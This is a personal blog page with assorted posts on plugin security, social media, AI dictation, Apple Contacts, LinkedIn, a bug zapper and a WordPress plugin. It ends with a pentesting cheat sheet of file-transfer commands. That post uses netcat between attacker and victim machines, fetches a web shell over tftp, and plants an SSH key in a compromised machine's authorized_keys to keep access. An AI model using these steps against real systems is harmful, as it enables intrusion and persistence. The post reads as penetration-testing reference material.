Category: technology

Posted on

Obsidian.md and Plugin Security

Obsidian.md is an awesome note taking system. However, any third party plugin you install has access to all the files on your computer. You must hope the developer is nice or that their GitHub credentials don’t get compromised by a bad actor who then pushes out a malicious update.

The barrier to entry to get a plugin added to the Obsidian marketplace is low, and performed only once. There is not follow-up security review.

Common retorts to these statements, and my replies:

  • It’s the same thing as X app (VS Code, e.g.)
    My reply: Yes, and that is also bad.
  • Plugins with many users are safer because they have more eyes reviewing the code
    My reply: Yes, and they are the more attractive targets. A contributor need only enough time to push a bad update no one notices to infect thousands of computers. So like, 20 minutes?
  • I don’t put anything valuable or private in my notes anyway
    My reply: How about the rest of your computer? Because that’s what they have access to.

In summary, if you use Obsidian, don’t use plugins until or unless they improve this situation.

Posted on

Getting out of it what you put into it

It’s been difficult to make myself come here and blog.

Somewhere along the way, things on the internet changed. I used to enjoy writing updates in a blog post, letting friends and family know what had been going on around here, what I was up to, or even just what I was thinking. I knew that there were certain people who followed my blog pretty frequently and would often comment or even just acknowledge that I had posted something. It was a nice community feeling, and I would read other people’s blogs as well. Somewhere along the way this all shifted. I think it probably had something to do with Facebook becoming the predominant platform for people posting updates and being able to keep up with many more people in that format.

It’s a real shame though, because now I’ve gotten myself off of Facebook, off of Instagram, off of Twitter, and I’m largely just biding my time here and on Bluesky.

I find myself not wanting to share content or updates or news or anything like that. I definitely feel more more guarded about what I share online.

Perhaps it’s because of all the horror stories I’ve read about people getting stalked or swatted or whatever, just because they said something someone else didn’t like or disagreed with. I’ve been thinking often about how the internet really has precipitated the downfall of humanity. It’s pretty sad because I thought it was going to be an awesome thing for quite a while.

It definitely had an un-jaded, innocent adolescence phase. However, what happened was that once the World Wide Web became more and more accessible and was starting to be carried around in everyone’s pockets, everything started to change for the worse.

I remember back in college I took a class on how to use the World Wide Web. It was a great introduction into internet culture, what it meant to have a flame war, what spam was, and what good netiquette was.

That’s a word you don’t really hear anymore. Netiquette. It’s a shame. Everyone thinks they have the right to just get very angry at everyone else now, and it’s taken a lot of the fun out of the whole thing.

Maybe if people had been required to take lessons about the internet in order to access it, and had to learn how easily you can be fooled by misinformation and how you need to be able to discern between what’s real and what’s not, we might not be in the predicament we’re in today.

So I don’t know, maybe I’ll take this blog down in the near future. Is anyone reading it? My web statistics say “no”. So this is pretty much an exercise in talking into the ether. I’m putting things into it, but getting out nothing.

Posted on

The Toxic Utility of AI

If you’ve ever ventured onto the social media platform called BlueSky (which, I do love and is the only social platform I am on), or certain corners of other platforms like Reddit, you will likely have run across a very passionate set of people who disavow and berate anything related to artificial intelligence technology. They get so rabid in their attacks, they lose sight of the fact that AI actually has some usefulness when applied to certain situations that don’t invade privacy, don’t steal intellectual property, and don’t do things without asking you. However, if you try to point this out, you will get blocked, banned, ridiculed, and blasted for bringing it up. There seems to be no middle ground for these anti-AI people.

It’s very unfortunate. I wholly sympathize with a lot of their concerns. I don’t like the fact that AI is using intellectual property such as artwork, writing, music, and a host of other things that humans have created in order to train itself. I don’t like that this is usually done without asking anyone for their permission. And I don’t like that we’re in this situation where we have to claw back what AI has taken from us. I totally understand why that has pissed some people off entirely because it has pissed me off for the same reasons.

I recently saw someone on LinkedIn post that AI is just a glorified spell checker. And I actually agree. It’s not creative. It’s not smart. It doesn’t make decisions on its own. It relies on everything that it has been fed. So it’s really way less than it’s cracked up to be in many ways.

All of that being said, there are absolutely worthwhile use cases for artificial intelligence.
Personally, I’ve started using voice dictation with AI-assisted technology to help me speed up typing and relieve my aging fingers that have gotten slower and are usually aching by the end of a long workday. I’m enjoying that aspect of AI very much.
In fact, this whole article was written by me using a voice-to-text app called, VoiceInk. It does such an incredible job at recognizing my speech patterns, pauses, and corrections of myself. These things weren’t possible just a few years ago with any sort of voice to text application. And it does it fast.

Anyway, these are just some thoughts I’ve had bugging me and I decided to get them out there.

Posted on

Cleaning Up Apple Contacts

Apple Contacts get out-of-sync and become a mess over time, especially if you have multiple email accounts and have amassed a collection of contacts over the years. This problem was driving me nuts for quite a while, so I finally decided to sit down and fix it. Since it wasn’t simple to research, but ended up being simple to fix, I thought I’d share the solution. I am drawing upon some guidance I found on Reddit, but adding some additional tips.

The solution is to get all your devices (iPhone, Mac, iPad, etc) to only use iCloud to sync your contacts. In my case, I had contacts split across multiple email accounts I had collected over the years, and they didn’t sync up. Some cleanup is required.

Pre-requisites

You need both a computer and your phone for this.

Solution

  • Go to your iPhone Contacts app.
  • Click the top-left corner where it says “Lists”:
  • You will see all the accounts housing your contact on this page.
  • At the top of this is is “All Contacts”, which is a collection of everything you see below. Long press the “All Contacts” line (this is the merged list of all Contacts from different accounts). You’ll see an option to export all contacts.
  • Export the backup file (All Contacts.vcf) to your email or iCloud Drive or Airdrop. Whichever you choose, the goal is to send it to your computer and save it there.
  • Log in to iCloud.com from a browser on your computer. This can’t be done from your iPhone.
  • Go to Contacts in iCloud.com and click the + sign, then select Import Contact.
Click Import Contact here
  • Import the VCF file you just saved to your computer.
  • This may end up creating multiple copies of some of your contacts, which is OK, because we will soon merge and remove duplicate contacts.
  • BUT FIRST, you will need to stop syncing contacts for all the accounts you see on your iPhone and your Mac (and any other device), and only sync contacts to iCloud. Here’s what it looks like on the Mac:
  • For each account listed, open it and un-check Contacts.
  • Do the same on your other devices. Have them sync contacts only via iCloud.
  • Back on your phone, load up the Contacts app again.
  • It should notify you the duplicates it found. You can safely click Merge. It may take a little time to sync up, depending on how many contacts you have, but this should solve all of your problems!
Posted on

LinkedIn is at Peak Enshittifaction

πŸ’‘
These are my personal opinions, which exist in an entirely segmented realm of my brain and my existence than that of my employer. They are not associated.

This is a story about the enshittification of LinkedIn. You are probably familiar with it.

I’ve been on LinkedIn for about 20 years. It started as a useful way to demonstrate my work experience, connect with current and past coworkers, and build business relationships. It was useful as a digital calling card of sorts.

At security conferences, I’d quickly pull up the app on my phone and befriend someone I had just met and had a conversation with. We’d keep in touch and Like or comment on each other’s LinkedIn posts.

Admittedly, most of those connections I made would never become anything else. We didn’t continue any real-world conversations or reach out to each other at all. These “friends” just became reminders of a short conversation I once had at a conference or workshop. I started wondering what the use of this site was, yet, everyone seemed to be using it, so I found myself curiously coming back once in a while.

Persistent Outreach

I can’t pick out an exact point in time that it started happening, but there was a noticeable shift in the kinds of connection requests I started getting. Maybe it coincided with my job title changes as they evolved and became more desirable for marketers to reach out to. Maybe it coincided with LinkedIn becoming a marketing person’s fertile playground. I am not sure, but something shifted.

One change I did notice, and I never felt like figuring out why, is that I started getting Followers in addition to people asking me to Connect. Some people would Follow me and then ask to Connect later. LinkedIn never did anything noticeable to explain what this all meant, but it happened.

Who? Why?

It was confusing, and I never felt like looking into it, so I just started ignoring them.

Sales Pitches

Everything started turning into sales pitches: requests to “run something by you,” get “10 minutes of your time,” show me an article they’d “really like your opinion on.” All in the name of making a connection –and possible sales lead– to meet a quota in SalesForce (most likely).

They even tried bribery in the form of sending me an Amazon gift card, just to meet with them for 30 minutes and hear their pitch. I know for a fact, based on experience, this would only lead to even more persistent follow-ups, “ticklers”, and pressurized tactics to sell to me.

I stopped going to LinkedIn as much.

Overly Persistent Salespeople

Within the last 2 years, I started getting connection requests alongside immediate follow-ups to my work email, and it became clear that I decided I needed to look into things – or shut down my LinkedIn account. Some setting somewhere must have changed, but I wasn’t sure what.

I was sure, however, that I had never put my work email address into LinkedIn. Yes, it was probably easy to guess based on who I work for, but this cold-calling tactic was sleazy and would immediately turn me off to any reputable vendors, especially when they had be annoyingly persistent by sending me multiple “just let me know if you’d like me to stop bugging you” types of emails.

In short: if you are a salesperson, please don’t do this.

Silent Privacy Changes

The company has implemented some invasive changes over the years, and didn’t bother to tell users – or buried the notices deep in their TOS that no one read. Their lack of privacy by default has always been concerning. Some of these were questionable, others, such as opting you in to AI training, were mind-boggling. There was even a short-lived lawsuit about that.

The AI setting you didn’t know about.

LinkedIn’s True Enshittification

The true indicator that we had reached the event horizon in the downfall of LinkedIn occurred sometime in the last year.

I logged in one day and saw that posts and comments had turned vitriolic. They had become like Twitter, like the comment section on your local newspaper’s website, or just about any thread on NextDoor these days.

An Executive Director!

People were making terrible statements with their employer’s name associated with them.

Posting your pronouns was never required. Why is it such a problem anyway?

Yes, it coincides with the political climate in the USA and the general climate of intolerant “free speech” that has proliferated everywhere as a result. But in a setting of professional profiles closely tied to employers? Why risk your job, your customer base, or your reputation?

“Listener”
Even using the “R” word.

I will just say this about that: we are all humans, we all deserve equal opportunity to live, love, and thrive. You know, that whole “Life, Liberty, and the Pursuit of Happiness” thing.

Live and let live. Do unto others as you would have them do unto you. A rising tide lifts all boats. You know…basic decency to others.

LinkedIn is now complicit in stifling these pursuits.

I am at a loss for any further words, really. Having left Facebook, Instagram, and Twitter within the last month, I am now shutting down my LinkedIn profile.

Indeed.

— willc

Posted on

Bugs inside the house?

No, not the smart home management variety that are always listening (looking at you, Siri, Alexa, and Google Home), or the kind that spies of yore used (or maybe still use?) to listen in on your dinner plans or football watching habits.

No, I am referring to actual bugs. Insects. Things that are highly annoying when they get into your home. We get these often in our house, as doors tend to get left open due to our indoor/outdoor lifestyle in the warmer months.

From mosquitos to house flies to various types of gnats and stinging things, we tend to get them all.

Aspectek Bug Zapper To The Rescue

On a whim, I bought one of these Aspektec bug zappers off Amazon, and it has been the best $40 I ever spent. In fact, I ended up buying a second one to keep in the basement since the one on the main floor worked so well. It attracts ’em, it zaps ’em, it splats ’em.

There are few downsides, however. First is that the zapping noise is rather loud, but that is also satisfying in a demented way.

Second is that the bugs don’t always fall into the removable tray at the bottom, so expect to wipe or vacuum some of them up.

Lastly, some of the bigger bugs this thing has zapped, including large flies and hornets, tend to linger a bit and get zapped repeatedly. In fact, they start smoldering on occasion, which isn’t the most pleasant thing when it comes to household smells. But I tend not to be bothered by that sort of thing.

The good news is my cats leave it alone and are not interested in it, and we don’t get eaten by mosquitos at night in our own house!

Posted on

All In One SEO Plugin in 2024: Avoid it like the plague

I updated the All In One SEO Plugin on this website today. The next thing I knew, I had two new plugins installed for me, the Monsterinsights and some sort of opt-in plugin called Optinmonster.

Yeet!

I deleted all that shit faster than you can throw a watermelon off an overpass. After googling around a bit to figure out what had happened, I discovered this post that keyed me in to what was going on:

MonsterInsights is Auto-installed
https://wordpress.org/support/topic/monsterinsights-is-auto-installed/

This is a terrible practice I hope no other WordPress plugin developers emulate. If you do, I hope the community shames you into reconsidering your ways.

Why is this so bad? Let me enumerate they ways:

Installing one plugin should never, EVER install more plugins without giving a person the awareness that this is happening! It’s bad form, it’s stealing a website’s resources, it’s stealing screen real estate, it’s introducing unknown risk, and broadening your website’s threat profile without telling you.

Then you get all these banners asking you to set up all these paid connections for these plugins to work. Bad form, again!

The Kicker

To top it all off, after walking through the All In One SEO setup steps, I found an email waiting for me moments later:

I did not opt in for this! This egregious action is most certainly in violation of the US CAN-SPAM laws. I can’t wait to report them. In fact, I will go do that now

Ok, I feel a little better now.

If you offer a plugin for people to use, you should never assume they want MORE plugins installed, and never grab their email address from their WordPress settings to sign them up for ANYTHING outside of your plugin installed.

Posted on

The Offensive Security Certified Professional (OSCP) Exam

The Offensive Security Certified Professional (OSCP) exam is known for being one of the most challenging certification exams in the cybersecurity field. It’s a hands-on test of your ability to identify and exploit vulnerabilities in a live, virtual environment.

The exam is not for the faint of heart. It requires a significant amount of time and effort to prepare, and even experienced security professionals may find it difficult to pass. In fact, the pass rate for the OSCP exam is typically less than 50%.

So, what makes the OSCP exam so challenging? For starters, it’s an extremely hands-on exam. Rather than simply testing your knowledge of security concepts, it requires you to actually demonstrate your skills by completing a series of real-world challenges. This means you need to have a strong foundation in security principles and a practical understanding of how to identify and exploit vulnerabilities.

In addition, the exam is time-limited. You have just 24 hours to complete the challenges and submit your results. This means you need to be able to work quickly and efficiently under pressure.

So, how can you prepare for the OSCP exam and improve your chances of passing? Here are a few tips:

  1. Take the OSCP training course. The OSCP exam is designed to test the skills and knowledge you gain from the Offensive Security Penetration Testing with Kali Linux (PwK) course. This course provides a comprehensive introduction to the tools and techniques used by professional penetration testers, and is an essential foundation for anyone looking to take the OSCP exam.
  2. Practice, practice, practice. The best way to prepare for the OSCP exam is to get hands-on experience with the tools and techniques you’ll be tested on. This means setting up your own lab environment and practicing your skills on a regular basis.
  3. Work through the lab challenges. The OSCP exam includes a series of lab challenges that test your ability to identify and exploit vulnerabilities in a live, virtual environment. Completing these challenges will give you a good idea of the types of tasks you’ll be expected to perform during the exam, and can help you develop the skills and confidence you need to succeed.
  4. Get support from the community. The OSCP exam can be a daunting and isolating experience, but you don’t have to go it alone. There are many online communities and forums where you can connect with other OSCP exam takers and get support, advice, and encouragement.

Overall, the OSCP exam is a challenging but rewarding experience. By preparing thoroughly and staying focused, you can increase your chances of success and earn one of the most respected certifications in the cybersecurity field.

—–

This entire blog post was created by artificial intelligence. Text by ChatGPT. Photo by Midjourney.

Posted on

Self Hosting – Cloudron

I have been using Cloudron recently, and after initially trying it out a couple years ago, I found it to be a really easy, awesome way to create my own, personal, cloud, keeping the peering eyes of big-tech out of my life.

So far I have been using Cloudron to manage my OnlyOffice office instance (better than MS Office or Google Docs) and my instance of Nextcloud, a Google Drive-like file storage and sharing center. They integrate with each other to create your own, secure, private office suite with file storage.

The best part is that you can do all this simply from the DigitalOcean Marketplace – a one-click shop for easy installation of everything. All you need is a domain name to point at it.

Once you have it installed, you can set it and forget it, as Cloudron will keep itself updated, patched, and secure.

Cloudron Coupon Code

It isn’t cheap to run Cloudron, but it lets you host 2 app without a subscriotion. I have yet to find a working Cloudron coupon code out there, but there are Cloudron referral codes such as my own (https://cloudron.io/?refcode=901142a319d1498b) which earn the referee a small discount. Once you have your own Cloudron account set up, you can use your own referral code and encourage others to use.

So that is me encouraging you to use my referrer code πŸ˜€

Posted on

Linux File Transfer Techniques

Digging through my pentesting notes from over the last few years, I pulled together various scrawled things on quick ways to transfer files from one place to another. Thought I’d share the reference here in case anyone finds it useful.

Note: Some of this may have been copy/pasted from various places — I don’t honestly remember. If you recognize something, let me know – I am happy to give credit where credit is due!

Simple Python HTTP Server

This is an easy way to set up a web-server. This command will make the entire folder, from where you issue the command, available on port 9999.

python -m SimpleHTTPServer 9999

Wget

You can download files from that running Pything server using wget like this:

wget 192.168.1.102:9999/file.txt

Curl

curl -O <http://192.168.0.101/file.txt>

Netcat

Another easy way to transfer files is by using netcat.

If you can’t have an interactive shell it might be risky to start listening on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can’t do ctr-c because that will kill your session.

So instead you can connect from the target machine like this.

On attacking machine:

nc -lvp 4444 < file

On target machine:

nc 192.168.1.102 4444 > file

You can of course also do it the risky way, the other way around:

So on the victim-machine we run nc like this:

nc -lvp 3333 > enum.sh

And on the attacking machine we send the file like this:

nc 192.168.1.103 < enum.sh

I have sometimes received this error:

This is nc from the netcat-openbsd package. An alternative nc is available

I have just run this command instead:

nc -l 1234 > file.sh

Socat

Server receiving file:

server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txtclient$ socat -u FILE:test.txt TCP:127.0.0.1:9876

Server sending file:

server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddrclient$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat

With php

echo "<?php file_put_contents('nameOfFile', fopen('<http://192.168.1.102/file>', 'r')); ?>" > down2.php

Ftp

If you have access to a ftp-client to can of course just use that. Remember, if you are uploading binaries you must use binary mode, otherwise the binary will become corrupted!!!

Tftp

On some rare machine we do not have access to nc and wget, or curl. But we might have access to tftp. Some versions of tftp are run interactively, like this:

$ tftp 192.168.0.101tftp> get myfile.txt

If we can’t run it interactively, for whatever reason, we can do this trick:

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

SSH – SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user directory you can find the hidden .ssh files by typing ls -la.Then you need to do two things.

Create a new keypair

You do that with:

ssh-keygen -t rsa -C "your_email@example.com"

then you enter a name for the key.

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKeyEnter passphrase (empty for no passphrase):Enter same passphrase again:

This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.

Add your public key to authorized_keys

Now you copy the content of nameOfMyKey_pub.On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

Log in

Now you should be all set to log in using your private key. Like this

ssh -i nameOfMyKey kim@192.168.1.103

SCP

Now we can copy files to a machine using scp

# Copy a file:scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext# Copy a directory:scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination

clicky